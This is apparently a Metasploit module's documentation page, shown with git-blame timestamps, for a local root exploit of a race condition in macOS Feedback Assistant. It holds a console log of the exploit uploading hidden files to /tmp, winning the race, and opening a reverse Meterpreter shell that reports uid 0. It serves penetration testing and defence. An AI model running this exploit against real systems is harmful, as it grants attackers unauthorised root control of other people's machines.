2020-01-20 21:26:59 -05:00
|
|
|
## Vulnerable Application
|
2019-05-20 12:49:24 -05:00
|
|
|
|
|
|
|
|
This module exploits a race condition in MacOS' Feedback Assistant, which would lead to root local
|
|
|
|
|
privilege escalation.
|
|
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
## Scenarios
|
2019-05-20 12:49:24 -05:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf5 exploit(osx/local/feedback_assistant_root) > check
|
|
|
|
|
[*] The target appears to be vulnerable.
|
|
|
|
|
msf5 exploit(osx/local/feedback_assistant_root) > run
|
|
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 172.16.135.1:5555
|
|
|
|
|
[*] Uploading file: '/tmp/.fjbgrf'
|
|
|
|
|
[*] Uploading file: '/tmp/.fljhjbwe'
|
|
|
|
|
[*] Executing exploit '/tmp/.fljhjbwe'
|
|
|
|
|
[*] Transmitting first stager...(210 bytes)
|
|
|
|
|
[*] Exploit result:
|
|
|
|
|
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
|
|
|
|
|
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
|
|
|
|
|
"/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
|
|
|
|
|
}
|
|
|
|
|
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
|
|
|
|
|
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
|
|
|
|
|
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
|
|
|
|
|
[*] Transmitting second stager...(8192 bytes)
|
|
|
|
|
[*] Sending stage (808504 bytes) to 172.16.135.130
|
|
|
|
|
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500
|
|
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: uid=0, gid=0, euid=0, egid=0
|
|
|
|
|
meterpreter >
|
2020-01-20 21:26:59 -05:00
|
|
|
```
|
